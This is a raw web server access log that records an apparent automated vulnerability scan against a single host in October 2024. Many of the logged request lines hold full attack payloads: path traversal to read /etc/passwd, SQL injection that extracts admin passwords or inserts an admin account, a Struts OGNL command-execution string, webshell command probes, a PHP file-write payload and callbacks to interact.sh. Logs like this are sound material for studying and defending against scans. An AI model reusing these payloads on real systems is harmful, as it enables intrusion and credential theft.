195.164.49.69 - - [20/Oct/2024:18:45:19 +0000] GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:18:45:41 +0000] POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:18:45:43 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
83.212.98.101 - - [20/Oct/2024:18:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:46:05 +0000] POST /json/setup-restore.action HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:46:27 +0000] GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:46:30 +0000] GET /session/login HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:18:46:34 +0000] GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:18:46:36 +0000] GET /wp-admin/profile.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:46:56 +0000] GET /api/v1/users HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:46:58 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:47:20 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:47:23 +0000] POST /enrollment/ajax.php?action=login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:18:47:25 +0000] GET /enrollment/index.php?page=home HTTP/1.1 404 1098
83.212.98.101 - - [20/Oct/2024:18:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:47:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:47:47 +0000] GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1 404 1445
195.164.49.69 - - [20/Oct/2024:18:47:48 +0000] GET /appliance/login HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:48:09 +0000] POST /jeecg-boot/jmreport/show HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:18:48:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:48:14 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:18:48:17 +0000] GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:48:17 +0000] GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:48:17 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
- - - [20/Oct/2024:18:48:23 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:18:48:24 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:18:48:26 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:49:23 +0000] GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:18:49:27 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:18:49:31 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:49:53 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:49:55 +0000] POST /cgi-bin/vitogate.cgi HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:50:16 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:18:50:20 +0000] GET /api/login/unlockGetData HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:50:22 +0000] POST /api/login/ HTTP/1.1 404 1092
- - - [20/Oct/2024:18:50:26 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:50:28 +0000] GET /wp-content/plugins/essential-blocks/readme.txt HTTP/1.1 404 1132
83.212.98.101 - - [20/Oct/2024:18:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:50:48 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:18:50:50 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:18:50:52 +0000] GET /wp-json/post-smtp/v1/get-log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:18:51:31 +0000] GET /api/v3/user/orgs HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:18:51:37 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:51:45 +0000] POST /wp-json/notificationx/v1/analytics HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:18:51:45 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:18:51:49 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:18:52:09 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:18:52:11 +0000] GET /streampipes-backend/api/v2/auth/settings HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:18:52:13 +0000] POST /graphql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:52:15 +0000] GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:18:52:17 +0000] GET /file=web_assets/../config.json HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:18:52:23 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:18:52:24 +0000] POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 404 1147
83.212.98.101 - - [20/Oct/2024:18:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
- - - [20/Oct/2024:18:52:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:53:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:53:04 +0000] POST /secserver/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:53:06 +0000] POST /secserver/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:53:09 +0000] POST /api/ HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:53:13 +0000] GET /api/data HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:18:53:15 +0000] POST /client/api?command=samlSso HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:53:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:53:19 +0000] GET /?p=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:53:21 +0000] POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:18:53:23 +0000] POST /webtools/control/view/StatsSinceStart HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:18:53:25 +0000] GET /asispanel/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:18:53:27 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:53:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:53:39 +0000] GET /workflow/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:18:53:45 +0000] GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272nii6y6bx7xtw3m1egussd3ybha%27%2C+NULL%2C+%273912723D06D820D3CA1CDF9DB18A94B2%27%2C+%272nii6y6bx7xtw3m1egussd3ybhaFirstName%27%2C+%272nii6y6bx7xtw3m1egussd3ybhaLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272nii6y6bx7xtw3m1egussd3ybha%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:53:47 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:54:09 +0000] PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:18:54:11 +0000] POST /api/v0/train HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:54:13 +0000] GET /wp-json/wp/v2/give_forms/ HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:18:54:14 +0000] GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:18:54:17 +0000] GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:54:38 +0000] POST /tracking/client_1/get-resource HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:18:54:40 +0000] POST /tracking/client_1/read-instruction HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:18:54:54 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:18:54:56 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:18:54:57 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:18:55:17 +0000] GET /interface-data/books-init HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:55:22 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:18:55:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:55:26 +0000] POST /index.php?action=porte_plume_previsu HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:18:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:18:55:48 +0000] GET /vicidial/welcome.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:18:55:50 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:18:55:52 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:55:54 +0000] POST /auth/createAdmin HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:56:04 +0000] POST /jars/upload HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:56:35 +0000] GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:56:37 +0000] GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:18:56:38 +0000] GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1097
- - - [20/Oct/2024:18:56:59 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:57:03 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:57:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:57:15 +0000] POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:18:57:16 +0000] POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:18:57:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:57:21 +0000] POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:18:57:23 +0000] POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1 404 1120
83.212.98.101 - - [20/Oct/2024:18:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:18:57:44 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:57:46 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:18:58:10 +0000] POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:18:58:12 +0000] GET /imc/primepush/%2e%2e/flex/topobg/sv61tOvCI3.txt HTTP/1.1 404 1141
- - - [20/Oct/2024:18:58:52 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:58:54 +0000] GET /2niI6tRWAC29h0FfDamueX4nOFc.txt HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:59:14 +0000] POST /http/index.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:18:59:38 +0000] POST /service_transport/service.action HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:18:59:39 +0000] GET /6ezUP.txt HTTP/1.1 404 1083
- - - [20/Oct/2024:18:59:43 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:18:59:45 +0000] GET /sslvpn/rbgla.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:18:59:47 +0000] POST /(download)/tmp/poc.txt HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:18:59:51 +0000] GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%222niI6yHHgIyPhJvFlUqwqmurP0V.php%22%2C%22%3C%3Fphp+echo+md5%28%22thinkcmf-rce%22%29%3Bunlink%28__FILE__%29%3B%22%29%3B HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:18:59:52 +0000] GET /2niI6yHHgIyPhJvFlUqwqmurP0V.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:18:59:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:18:59:55 +0000] GET /go6w4eqzsgk.php HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:18:59:58 +0000] POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:00:00 +0000] POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:00:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:00:43 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
83.212.98.101 - - [20/Oct/2024:19:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:00:45 +0000] GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1 404 1170
195.164.49.69 - - [20/Oct/2024:19:00:47 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:19:00:48 +0000] GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:00:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:00:53 +0000] GET /current_config/Sha1Account1 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:00:55 +0000] GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:00:57 +0000] GET /js/elfinder.min.js HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:00:59 +0000] GET /js/elFinder.version.js HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:01:00 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:19:01:02 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:01:06 +0000] GET /rest/users/1/settings/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:01:08 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:01:10 +0000] GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:01:12 +0000] GET /wp-admin/install.php?step=1 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:01:13 +0000] GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:01:15 +0000] GET /current_config/passwd HTTP/1.1 404 1099
- - - [20/Oct/2024:19:01:18 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:01:20 +0000] GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:19:01:21 +0000] GET /secure/ContactAdministrators!default.jspa HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:19:01:24 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:01:25 +0000] GET /data/pbootcms.db HTTP/1.1 404 1094
- - - [20/Oct/2024:19:01:28 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:01:30 +0000] POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:01:32 +0000] GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:01:35 +0000] GET /lab.html?vpath=//interact.sh HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:01:37 +0000] GET /horde/admin/user.php HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:01:38 +0000] GET /admin/user.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:01:40 +0000] GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:01:42 +0000] GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:01:44 +0000] GET /?url=http://0177.0.0.1/server-status HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:01:46 +0000] GET /?host=http://0177.0.0.1/server-status HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:01:48 +0000] GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:01:50 +0000] GET /pods HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:01:51 +0000] GET /api/v1/pods HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:01:54 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:01:55 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:01:58 +0000] GET /dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:02:00 +0000] GET /+CSCOE+/session_password.html HTTP/1.1 404 1107
- - - [20/Oct/2024:19:02:02 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:02:04 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:19:02:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:02:13 +0000] GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:02:15 +0000] GET /?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:17 +0000] GET /?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:19 +0000] GET /?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:02:20 +0000] GET /?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1 200 11204
